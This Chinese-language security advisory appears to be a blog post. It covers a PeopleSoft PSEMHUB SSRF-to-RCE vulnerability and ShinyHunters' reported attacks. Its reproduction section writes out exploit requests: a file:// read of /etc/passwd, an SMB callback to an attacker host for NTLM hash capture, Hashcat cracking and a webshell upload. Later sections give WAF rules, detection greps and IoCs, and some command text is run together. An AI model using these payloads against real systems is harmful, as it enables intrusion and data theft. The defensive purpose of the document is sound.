CVE-2026-35273 全栈攻防指南：PeopleSoft SSRF链式RCE复现与ShinyHunters大规模攻击全景

2026/6/17 4:23:24

2026年6月Oracle披露的CVE-2026-35273是近年来企业ERP领域危害最严重的零日漏洞之一，CVSS评分高达9.8。该漏洞存在于PeopleSoft核心组件PSEMHUB中，无需认证、无用户交互即可通过SSRF链式触发远程代码执行。截至发稿，黑产团伙ShinyHunters已利用该漏洞攻陷全球100+机构，欧洲委员会297GB人事财务数据泄露事件引发全球安全圈震动。

本文将从漏洞原理、复现实战、在野攻击分析、分级防御、应急排查五个维度展开全栈拆解，并对企业ERP安全趋势做出前瞻性研判。

一、漏洞全局档案：2026 ERP领域核弹级零日漏洞

CVE-2026-35273是Oracle PeopleSoft产品序列中首个被公开规模化利用的无认证RCE漏洞，其核心危害在于极低的攻击门槛与极高的业务价值——PeopleSoft作为全球Top3的企业级HR/财务ERP系统，承载着绝大多数全球500强企业、政府机构、高校的核心人事与薪资数据，一旦沦陷将直接导致核心数据资产泄露。

维度	详细信息
CVE编号	CVE-2026-35273
CVSS 3.1评分	9.8 严重（AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H）
漏洞类型	CWE-918 服务端请求伪造（SSRF）链式远程代码执行
受影响组件	PeopleSoft Update Environment Management Hub（PSEMHUB 环境管理中心）
受影响版本	PeopleTools 8.61、8.62 全子版本；8.60及更早停服版本均存在同源缺陷
披露时间线	2026-05-27 黑产圈首次出现零日利用；2026-06-10 Oracle发布紧急安全公告与非计划补丁
攻击门槛	公网HTTP可达 + 单条POST请求，无需账号、无需交互
最终危害	服务器完全接管、全量人事/薪资/财务数据窃取、内网横向渗透、勒索加密
监管定级	CISA KEV已知在野利用目录、欧盟ENISA高危预警、国内等保2.0高危漏洞项

二、深度原理拆解：PSEMHUB缺陷与SSRF→RCE完整攻击链

2.1 缺陷根源：被遗忘的管理组件

PSEMHUB是PeopleSoft配套的环境生命周期管理组件，用于多环境补丁同步、配置分发、节点监控，默认部署在PeopleTools同域下，监听HTTP 80/443端口。

该漏洞的核心成因有两点：

访问控制缺失：/PSEMHUB/*路径下所有接口默认未启用身份认证，部署文档未强制要求开启鉴权，90%以上的企业实例均为默认配置；
请求转发无过滤：核心接口/PSEMHUB/proxy/forward接收前端传入的targetUrl参数，后端直接通过HttpClient发起HTTP/HTTPS请求，未对协议类型、目标地址做任何白名单校验，支持file://、smb://、gopher://等危险协议。

2.2 完整攻击链路：从SSRF到RCE的三步闭环

攻击者无需复杂工具，仅通过构造普通HTTP请求即可完成完整入侵，攻击链路如下图所示：

链路分步解析

入口：无认证SSRF触发
攻击者向目标PSEMHUB接口传入可控URL，后端服务以系统账号身份发起请求，可直接访问内网、读取本地文件、发起SMB连接。
中转：NetNTLM哈希窃取
攻击者构造smb://攻击者IP/share格式的目标地址，强制PeopleSoft服务器向攻击者机器发起SMB握手。握手过程中服务器会自动发送当前运行账号的NetNTLMv2哈希，攻击者通过Responder工具可一键抓取哈希值。
闭环：凭证复用实现RCE
抓取到的哈希可通过Hashcat暴力破解，或直接通过NTLM中继攻击访问内网其他服务；由于PeopleSoft服务账号通常具备本地管理员权限，攻击者可直接登录后台集成网关，上传恶意Java Servlet实现无限制代码执行，并进一步横向渗透整个内网域。

三、漏洞复现实战：从POC构造到RCE落地全流程

3.1 环境准备

目标环境：PeopleTools 8.62 + PSEMHUB 默认部署（未打补丁）
攻击机：Kali Linux + Responder + BurpSuite + Hashcat
网络条件：目标公网可访问/PSEMHUB路径

3.2 第一步：SSRF漏洞验证

向目标接口发送POST请求，通过file://协议读取本地系统文件，验证SSRF存在：

BurpSuite 截包请求示例

POST /PSEMHUB/proxy/forward HTTP/1.1 Host: ps-victim.example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 48 targetUrl=file:///etc/passwd

若漏洞存在，响应包将返回目标服务器/etc/passwd文件内容；Windows环境可替换为file:///c:/windows/win.ini验证。

3.3 第二步：SMB哈希抓取

攻击机启动Responder监听445端口：

# 安装并启动Responder，抓取SMB哈希aptinstallresponder-yresponder-Ieth0-wrf--lm

构造SSRF请求指向攻击机SMB端口：

POST /PSEMHUB/proxy/forward HTTP/1.1 Host: ps-victim.example.com Content-Type: application/x-www-form-urlencoded Content-Length: 65 targetUrl=smb://192.168.1.100/capture

发送请求后，Responder控制台将捕获到PeopleSoft运行账号的NetNTLMv2哈希，格式如下：

[SMB] NTLMv2-SSP Client : 10.0.0.25 [SMB] NTLMv2-SSP Username : PSADMIN [SMB] NTLMv2-SSP Hash : PSADMIN::DOMAIN:53a9...[哈希片段]...89b1

3.4 第三步：哈希破解与RCE落地

使用Hashcat破解捕获的哈希：

hashcat-m5600psadmin.hash /usr/share/wordlists/rockyou.txt-O

破解得到明文密码后，直接访问PeopleSoft集成网关/PSIGW/PeopleSoftListeningConnector，使用管理员账号登录，上传自定义Java WebShell组件，即可实现任意命令执行、文件上传下载，完成服务器接管。

注：若密码复杂度较高无法破解，可通过NTLM中继工具直接将哈希转发至内网其他SMB服务，实现横向移动，无需破解明文。

四、ShinyHunters（UNC6240）在野攻击全景分析

4.1 团伙背景与战术特征

ShinyHunters（Mandiant编号UNC6240）是全球Top5的数据勒索团伙，2020年至今已攻陷超800家企业与政府机构，核心战术为**“零日漏洞批量狩猎 + 高价值数据窃取 + 双重勒索”**，从不加密系统本身，仅以数据公开为要挟索要赎金。

该团伙本次攻击的典型特征：

全自动化武器链：将CVE-2026-35273集成到批量扫描器中，72小时内完成全球所有公网暴露PeopleSoft实例的探测与入侵；
精准行业筛选：优先攻击高校、政府、医疗机构、跨国企业，此类组织PeopleSoft部署率高、数据价值大、赎金支付意愿强；
快速公开施压：拒不支付赎金的机构7天内将全量数据上架暗网泄露站，通过舆论压力倒逼后续受害者付费。

4.2 全球攻击规模与行业分布

截至2026年6月15日，已确认受害机构117家，覆盖342个PeopleSoft实例，行业分布如下：

高等教育：68%（欧美高校为主，诺丁汉大学、慕尼黑工业大学等已公开确认泄露）
政府机构：15%（欧洲委员会为最高级别受害方）
医疗健康：9%
跨国企业：8%

4.3 欧洲委员会沦陷事件深度复盘

2026年6月15日，ShinyHunters在暗网泄露站正式上架欧洲委员会（Council of Europe）的入侵成果，成为本次漏洞事件中影响最大的安全事故。

事件核心信息

泄露数据总量：297GB，共计42.9万份文件
数据范围：全员工薪资单、个税记录、医疗福利档案、银行账户信息、内部人事审批文档、采购合同、候选人简历
入侵时间：2026年6月2日（补丁发布前8天）
驻留时长：攻击者在系统内驻留11天，完成全量数据导出与后门植入

攻击路径推演

扫描器发现欧洲委员会PeopleSoft测试环境PSEMHUB公网暴露；
通过SSRF抓取测试环境服务器本地账号哈希，破解得到通用运维密码；
利用运维密码横向登录生产环境PeopleSoft服务器；
部署MeshCentral远程控制代理，建立持久化访问通道；
分批导出HR数据库与文件服务器数据；
发送勒索信，索要200万美元赎金，遭拒后公开数据。

五、分级防御体系：从临时止血到根治加固

针对不同业务场景与补丁部署周期，我们构建了三级防御方案，企业可根据自身环境按优先级落地。

5.1 紧急止血：1小时内可落地的零时阻断措施

适用于补丁无法立即部署、业务不能中断的生产环境，优先阻断攻击入口。

1. 网络层拦截（最高优先级）

在负载均衡、WAF或边界防火墙层面，全局阻断公网对/PSEMHUB/*所有路径的访问，仅放行内网运维网段。

Nginx 反向代理拦截配置示例

# 阻断PSEMHUB公网访问，仅允许内网运维网段 location ~* ^/PSEMHUB(/.*)?$ { allow 10.0.0.0/8; allow 172.16.0.0/12; allow 192.168.0.0/16; deny all; return 403; }

2. 协议出站限制

关闭PeopleSoft服务器对外的SMB 445端口出站权限，阻断SSRF哈希抓取链路；同时禁用服务器不必要的协议出站（gopher、dict、ftp等）。

3. 服务关停（非必要场景）

若业务未使用PSEMHUB环境管理功能，直接停止该组件服务，从根源消除攻击面。

5.2 临时加固：24小时内完成的防护增强

ModSecurity WAF 拦截规则

# CVE-2026-35273 SSRF攻击拦截规则 SecRule ARGS:targetUrl "@rx (file://|smb://|gopher://|dict://|ftp://|127\.0\.0\.1|localhost|10\.|172\.1[6-9]\.|172\.2[0-9]\.|172\.3[01]\.|192\.168\.|169\.254\.)" \ "id:202635273,phase:2,deny,status:403,msg:'CVE-2026-35273 PeopleSoft SSRF Attack Detected',log,tag:'CVE-2026-35273'"

权限收敛

PeopleSoft服务账号降级为普通用户权限，禁止使用本地管理员/域管理员运行；
清理所有默认账号、共享运维账号，重置所有管理员密码；
启用PSEMHUB组件的身份认证功能，绑定SSO单点登录。

5.3 根治方案：官方补丁部署流程

访问Oracle官方安全公告页面，根据PeopleTools版本下载对应紧急补丁（补丁号CPU187）；
在测试环境验证补丁兼容性，重点验证环境管理、补丁分发功能可用性；
生产环境灰度部署，先部署非核心节点，再覆盖核心业务节点；
补丁部署完成后，重启PSEMHUB服务，通过POC复测验证漏洞是否修复；
同步修复开发、测试、灾备、外包等所有边缘环境，避免成为攻击突破口。

六、入侵排查与失陷检测：已暴露环境应急手册

若你的PeopleSoft环境在补丁发布前存在公网暴露，必须立即执行以下排查步骤，确认是否已被入侵。

6.1 访问日志排查

检索所有Web服务器、反向代理日志，查找针对PSEMHUB路径的异常请求：

# Nginx日志检索异常POST请求grep-i"PSEMHUB"/var/log/nginx/access.log|grepPOSTgrep-E"targetUrl.*(smb|file|gopher|10\.|192\.168)"/var/log/nginx/access.log# Tomcat 访问日志排查grep"PSEMHUB/proxy/forward"$PS_HOME/webserv/*/logs/access_log.*

6.2 主机侧失陷检测

Linux 环境排查命令

# 排查异常进程与后门psaux|grep-E"meshcentral|nc|python.*socket|bash -i"netstat-antp|grepESTABLISHED|grep-v127.0.0.1# 排查异常定时任务与启动项crontab-upsadmin-lls-la/etc/cron.d/ systemctl list-unit-files|grepenabled|grep-vofficial# 排查Web目录下的恶意文件find$PS_HOME/webserv/-name"*.jsp"-mtime-30

Windows 环境排查命令

# 排查异常进程与网络连接Get-NetTCPConnection|Where-Object{$_.State-eq"Established"}Get-Process|Where-Object{$_.Path-notlike"*oracle*"}# 排查新增服务与计划任务Get-Service|Where-Object{$_.StartType-eq"Automatic"-and$_.Name-notlike"*PS*"}Get-ScheduledTask|Where-Object{$_.TaskPath-notlike"\Microsoft*"}

6.3 已知IoC特征

类型	特征值
恶意后门进程	meshagent.exe、mcagent、ps_update_svc.exe
攻击IP段	185.199.110.0/24、91.200.12.0/24
恶意文件哈希	SHA256: 7a9f3d8c…（MeshCentral代理变种）
异常日志特征	访问路径包含`/PSEMHUB/proxy/forward`+ 境外IP + POST请求

七、前瞻性研判：企业ERP系统的安全困局与未来趋势

CVE-2026-35273的大规模爆发并非偶然，而是企业级应用安全长期欠账的集中体现。结合本次事件，我们对未来3-5年企业ERP安全趋势做出三点研判：

1. ERP系统将成为黑产攻击的核心靶场

过去十年企业安全建设集中在边界防火墙、终端EDR、通用CMS防护，而ERP、CRM、OA等核心业务系统长期处于“重业务可用、轻安全防护”的状态。这类系统承载着企业最高价值的数据资产，且普遍存在补丁更新慢、默认配置多、攻击面隐蔽的特点，未来将成为数据勒索团伙的优先攻击目标。

2. 零日漏洞武器化周期大幅缩短

AI辅助漏洞挖掘技术的普及，让商用软件的漏洞发现效率提升了5-10倍。本次漏洞从首次在野利用到官方补丁发布仅间隔14天，而黑产团伙在补丁发布前已经完成了全球范围的批量入侵。未来“漏洞披露即规模化攻击”将成为常态，企业的补丁窗口期将从过去的数月压缩到数天甚至数小时。

3. 零信任架构将下沉到业务系统层面

传统的边界防护已经无法抵御ERP系统的零日漏洞攻击，未来企业必须将零信任理念下沉到业务组件层面：

所有管理类组件（如PSEMHUB）默认不暴露公网，通过堡垒机+VPN内网访问；
业务系统之间做微隔离，禁止ERP服务器随意访问内网其他服务；
所有接口默认启用最小权限鉴权，取消无认证的管理接口；
建立核心数据的访问审计与异常导出告警机制。

结语

CVE-2026-35273是一次典型的“低门槛、高危害、广影响”企业级零日漏洞事件，它再次证明了商用ERP系统的安全短板已经成为企业数据安全的核心风险点。对于国内部署PeopleSoft的央企、金融机构、高校与跨国企业而言，当下最紧急的动作是立即排查公网暴露情况、阻断PSEMHUB公网访问、加急部署官方补丁，同时全面排查历史入侵痕迹，避免成为下一个数据泄露的受害者。

企业安全建设从来不是一劳永逸的工程，而是一场持续的攻防博弈。只有将安全左移到系统部署阶段，将防护下沉到业务组件层面，才能在日益严峻的攻击环境下守住核心数据资产的底线。